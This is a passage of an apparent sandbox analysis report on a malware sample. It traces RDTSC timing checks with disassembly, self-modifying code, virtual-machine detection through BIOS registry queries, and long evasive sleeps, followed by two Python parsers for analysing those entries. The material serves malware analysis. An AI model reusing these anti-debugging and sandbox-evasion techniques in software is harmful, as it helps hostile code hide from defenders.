              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C26E second address: 35C280 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0CB0E1B256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F0CB0E1B25Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BDF4 second address: 35BDFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0CB0C50336h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BF49 second address: 35BF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BF4D second address: 35BF53 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB06B6 second address: 4CB06BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB06BA second address: 4CB0747 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0CB0E1B263h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F0CB0E1B269h 0x0000000f pushfd 0x00000010 jmp 00007F0CB0E1B260h 0x00000015 sbb cx, 6248h 0x0000001a jmp 00007F0CB0E1B25Bh 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 nop 0x00000023 jmp 00007F0CB0E1B25Fh 0x00000028 xchg eax, ebx 0x00000029 jmp 00007F0CB0E1B266h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0CB0E1B25Eh 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0747 second address: 4CB074D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB074D second address: 4CB0751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB07B0 second address: 4CB07C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB07C0 second address: 4CB07C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0EB0 second address: 4CA0ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50348h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0ECC second address: 4CA0EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B25Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0EDE second address: 4CA0F01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0CB0C50346h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F01 second address: 4CA0F10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F10 second address: 4CA0F40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 594D07CAh 0x00000008 jmp 00007F0CB0C5033Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0CB0C50345h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F40 second address: 4CA0F6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007F0CB0E1B25Ah 0x00000018 pop eax 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0CF8 second address: 4CB0CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0CFC second address: 4CB0D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0D02 second address: 4CB0D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0CB0C50346h 0x0000000b xor ax, E218h 0x00000010 jmp 00007F0CB0C5033Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [769B459Ch], 05h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0D3F second address: 4CB0D45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0DC9 second address: 4CB0DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0DD9 second address: 4CB0E12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 6AA50DB1h 0x00000010 pushad 0x00000011 mov ebx, 2FCCD5F8h 0x00000016 push edx 0x00000017 call 00007F0CB0E1B25Ch 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e popad 0x0000001f xor dword ptr [esp], 1C3F9199h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0E12 second address: 4CB0E25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0E25 second address: 4CB0E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 3Bh 0x00000005 pushfd 0x00000006 jmp 00007F0CB0E1B260h 0x0000000b jmp 00007F0CB0E1B265h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 call 00007F0D22ABFF74h 0x00000019 push 76952B70h 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov eax, dword ptr [esp+10h] 0x00000029 mov dword ptr [esp+10h], ebp 0x0000002d lea ebp, dword ptr [esp+10h] 0x00000031 sub esp, eax 0x00000033 push ebx 0x00000034 push esi 0x00000035 push edi 0x00000036 mov eax, dword ptr [769B4538h] 0x0000003b xor dword ptr [ebp-04h], eax 0x0000003e xor eax, ebp 0x00000040 push eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 push dword ptr [ebp-08h] 0x00000047 mov eax, dword ptr [ebp-04h] 0x0000004a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000051 mov dword ptr [ebp-08h], eax 0x00000054 lea eax, dword ptr [ebp-10h] 0x00000057 mov dword ptr fs:[00000000h], eax 0x0000005d ret 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0E5F second address: 4CB0E72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0E72 second address: 4CB0EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esi, esi 0x0000000d jmp 00007F0CB0E1B263h 0x00000012 mov dword ptr [ebp-1Ch], esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0CB0E1B260h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0EA9 second address: 4CB0EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0EB8 second address: 4CB0ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B264h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0ED0 second address: 4CB0ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0F42 second address: 4CB0F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0379 second address: 4CD037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD037D second address: 4CD0381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0381 second address: 4CD0387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0387 second address: 4CD03C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B265h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007F0CB0E1B25Ch 0x00000011 movzx esi, di 0x00000014 pop edx 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0CB0E1B260h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03C9 second address: 4CD03CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03CD second address: 4CD03D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03D3 second address: 4CD03E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03E4 second address: 4CD040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0CB0E1B25Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD040A second address: 4CD042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F0CB0C5033Eh 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD042C second address: 4CD046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F0CB0E1B266h 0x00000011 test esi, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0CB0E1B267h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD046F second address: 4CD0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0D228CE261h 0x0000000f jmp 00007F0CB0C5033Eh 0x00000014 cmp dword ptr [769B459Ch], 05h 0x0000001b pushad 0x0000001c call 00007F0CB0C5033Eh 0x00000021 pop ecx 0x00000022 jmp 00007F0CB0C50347h 0x00000027 popad 0x00000028 je 00007F0D228E62FEh 0x0000002e jmp 00007F0CB0C50346h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0CB0C50347h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0505 second address: 4CD0562 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0CB0E1B265h 0x0000000b jmp 00007F0CB0E1B25Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 mov ebx, 43FCE91Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F0CB0E1B261h 0x00000023 sub esi, 0747EB96h 0x00000029 jmp 00007F0CB0E1B261h 0x0000002e popfd 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0588 second address: 4CD058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD058C second address: 4CD0592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0592 second address: 4CD05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD05A3 second address: 4CD05B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD05B2 second address: 4CD05B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD05B6 second address: 4CD05BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD05BA second address: 4CD05C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0600 second address: 4CD064C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B269h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 pushfd 0x00000011 jmp 00007F0CB0E1B264h 0x00000016 sub esi, 12B72798h 0x0000001c jmp 00007F0CB0E1B25Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD064C second address: 4CD0652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0652 second address: 4CD0656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
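The interceptor entries above record every pair of consecutive RDTSC reads the sample executed; nearly all of the code between two reads is push/pop/pushad/popad filler, and the actual decision points (a compare against a fixed address, a conditional branch) are rare. The following parser, added here as an example and not part of Joe Sandbox or the sample, pulls the address pairs and instruction lists out of such lines and separates filler from decisions. The padding and decision mnemonic sets are an assumption made for this example; the three sample lines are copied from the entries above.

```python
import re
from dataclasses import dataclass

# Constructed input: three entries copied in the shape of the report's
# "RDTSC instruction interceptor" lines (same addresses and mnemonics).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB03E5 second address: 4CB03E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0D02 second address: 4CB0D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0CB0C50346h 0x0000000b xor ax, E218h 0x00000010 jmp 00007F0CB0C5033Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [769B459Ch], 05h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD046F second address: 4CD0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0D228CE261h 0x0000000f jmp 00007F0CB0C5033Eh 0x00000014 cmp dword ptr [769B459Ch], 05h 0x0000001b pushad 0x0000001c call 00007F0CB0C5033Eh 0x00000021 pop ecx 0x00000022 jmp 00007F0CB0C50347h 0x00000027 popad 0x00000028 je 00007F0D228E62FEh 0x0000002e jmp 00007F0CB0C50346h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0CB0C50347h 0x0000003b rdtsc",
]

# Assumed classification for this example: mnemonics that only shuffle
# registers/flags (or jump over junk) are filler; compares and conditional
# branches are where the timing result is actually consumed.
PADDING = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "nop", "jmp"}
DECISION = {"cmp", "test", "je", "jne", "jz", "jnz", "jg", "jl", "ja", "jb", "js", "jns"}

HEADER_RE = re.compile(r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) instructions: (.*)$")
INSTR_RE = re.compile(r"0x([0-9A-Fa-f]{8}) (.+?)(?= 0x[0-9A-Fa-f]{8} |$)")
ABS_MEM_RE = re.compile(r"\[([0-9A-Fa-f]{8})h\]")  # absolute memory operand like [769B459Ch]


@dataclass
class RdtscPair:
    first: int
    second: int
    instructions: list  # (offset, text) tuples, both rdtsc bookends included

    @property
    def interior(self):
        return [text for _, text in self.instructions[1:-1]]

    @property
    def padding_count(self):
        return sum(1 for t in self.interior if t.split()[0] in PADDING)

    @property
    def decisions(self):
        return [t for t in self.interior if t.split()[0] in DECISION]


def parse_line(line: str) -> RdtscPair:
    """Parse one 'RDTSC instruction interceptor' report line."""
    m = HEADER_RE.search(line)
    if not m:
        raise ValueError("not an RDTSC interceptor line")
    instrs = [(int(off, 16), text.strip()) for off, text in INSTR_RE.findall(m.group(3))]
    if len(instrs) < 2 or instrs[0][1] != "rdtsc" or instrs[-1][1] != "rdtsc":
        raise ValueError("expected rdtsc at both ends of the trace")
    return RdtscPair(int(m.group(1), 16), int(m.group(2), 16), instrs)


def summarize(lines):
    """Aggregate view: how much of the inter-RDTSC code is filler, and which
    decisions and absolute addresses the timing checks actually touch."""
    pairs = [parse_line(l) for l in lines]
    return {
        "pairs": len(pairs),
        # consecutive entries chain (second of one == first of the next)
        "distinct_rdtsc_sites": len({a for p in pairs for a in (p.first, p.second)}),
        "interior_instructions": sum(len(p.interior) for p in pairs),
        "padding_instructions": sum(p.padding_count for p in pairs),
        "decisions": [d for p in pairs for d in p.decisions],
        "absolute_memory_operands": sorted({int(a, 16) for p in pairs for t in p.interior for a in ABS_MEM_RE.findall(t)}),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_LINES)
    print(f"{s['pairs']} pairs, {s['padding_instructions']}/{s['interior_instructions']} interior instructions are filler")
    for d in s["decisions"]:
        print("decision:", d)
    print("absolute operands:", [hex(a) for a in s["absolute_memory_operands"]])
```

Run over the full set of entries above, the summary shows the same picture the three sample lines give: tens of RDTSC sites, filler making up most of the code between them, and the same `cmp dword ptr [769B459Ch], 05h` recurring at several sites, which is the address worth resolving to a module and symbol in the memory dumps before deciding what the timing check gates.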
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12EB3E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 2CB038 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 2C9733 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 515
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 2742
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 2789
Source: C:\Users\user\Desktop\file.exe | TID: 6104 | Thread sleep count: 58 > 30
Source: C:\Users\user\Desktop\file.exe | TID: 6104 | Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\Desktop\file.exe | TID: 3404 | Thread sleep count: 59 > 30
Source: C:\Users\user\Desktop\file.exe | TID: 3404 | Thread sleep time: -118059s >= -30000s
Source: C:\Users\user\Desktop\file.exe | TID: 5424 | Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | TID: 1880 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | TID: 2188 | Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\file.exe | TID: 2188 | Thread sleep time: -110055s >= -30000s
Source: C:\Users\user\Desktop\file.exe | TID: 3060 | Thread sleep count: 515 > 30
Source: C:\Users\user\Desktop\file.exe | TID: 3060 | Thread sleep time: -1030515s >= -30000s
Source: C:\Users\user\Desktop\file.exe | TID: 6460 | Thread sleep count: 2742 > 30
Source: C:\Users\user\Desktop\file.exe | TID: 6460 | Thread sleep time: -5486742s >= -30000s
Source: C:\Users\user\Desktop\file.exe | TID: 5140 | Thread sleep count: 2789 > 30
Source: C:\Users\user\Desktop\file.exe | TID: 5140 | Thread sleep time: -5580789s >= -30000s
Source: C:\Users\user\Desktop\file.exe | TID: 5140 | Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\Desktop\file.exe | TID: 3260 | Thread sleep count: 54 > 30
Source: C:\Users\user\Desktop\file.exe | TID: 3260 | Thread sleep time: -108054s >= -30000s
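The sleep lines above are worth reading together rather than one at a time: the report prints the raw relative delay (negative, as NtDelayExecution expects for relative intervals) and flags any thread that sleeps more than 30 times or for more than 30000 units in total. The script below, an added example that is not part of the report, groups those lines per thread, re-applies the report's two thresholds, and derives the per-call delay, which turns out to be the same fixed value for every thread that has both a count and a time. Pairing a count line with the next time line for the same TID is an assumption about the report's ordering; the input lines are copied from above.

```python
import re
from collections import defaultdict

# Constructed input: the sleep-related lines of the report, copied as printed.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 515",
    r"Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2742",
    r"Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2789",
    r"Source: C:\Users\user\Desktop\file.exe TID: 6104Thread sleep count: 58 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 6104Thread sleep time: -116058s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 3404Thread sleep count: 59 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 3404Thread sleep time: -118059s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 5424Thread sleep time: -36000s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 1880Thread sleep time: -180000s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 2188Thread sleep count: 55 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 2188Thread sleep time: -110055s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 3060Thread sleep count: 515 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 3060Thread sleep time: -1030515s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 6460Thread sleep count: 2742 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 6460Thread sleep time: -5486742s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 5140Thread sleep count: 2789 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 5140Thread sleep time: -5580789s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 5140Thread sleep time: -42021s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 3260Thread sleep count: 54 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 3260Thread sleep time: -108054s >= -30000s",
]

# The two thresholds the report itself applies ("count: 58 > 30", "time: ... >= -30000s").
COUNT_THRESHOLD = 30
TIME_THRESHOLD = 30000

SLEEP_RE = re.compile(r"TID: (\d+)\s*Thread sleep (count|time): (-?\d+)")
DELAYED_RE = re.compile(r"threadDelayed (\d+)")


def parse_sleep_lines(lines):
    """Group sleep lines per thread. A 'count' line opens an entry and the next
    'time' line for the same TID completes it (assumed ordering); a 'time' line
    with no open entry becomes an entry with count None."""
    entries = defaultdict(list)
    for line in lines:
        m = SLEEP_RE.search(line)
        if not m:
            continue
        tid, kind, value = m.group(1), m.group(2), int(m.group(3))
        if kind == "count":
            entries[tid].append({"count": value, "time": None})
        else:
            magnitude = abs(value)  # relative delays are printed as negative numbers
            open_entries = [e for e in entries[tid] if e["time"] is None]
            if open_entries:
                open_entries[-1]["time"] = magnitude
            else:
                entries[tid].append({"count": None, "time": magnitude})
    return dict(entries)


def flagged_threads(entries):
    """TIDs that trip either of the report's thresholds."""
    return sorted(
        tid for tid, es in entries.items()
        if any((e["count"] or 0) > COUNT_THRESHOLD or (e["time"] or 0) >= TIME_THRESHOLD for e in es)
    )


def per_call_delays(entries):
    """Delay per sleep call (report units) for entries that carry both figures."""
    return {tid: [e["time"] // e["count"] for e in es if e["count"] and e["time"]]
            for tid, es in entries.items()}


def total_delay(entries):
    return sum(e["time"] or 0 for es in entries.values() for e in es)


def thread_delayed_values(lines):
    """The 'threadDelayed N' counts, which should reappear as sleep counts."""
    return sorted(int(m.group(1)) for l in lines for m in [DELAYED_RE.search(l)] if m)


if __name__ == "__main__":
    entries = parse_sleep_lines(SAMPLE_LINES)
    print("flagged:", flagged_threads(entries))
    print("per-call delay:", per_call_delays(entries))
    print("total delay:", total_delay(entries))
```

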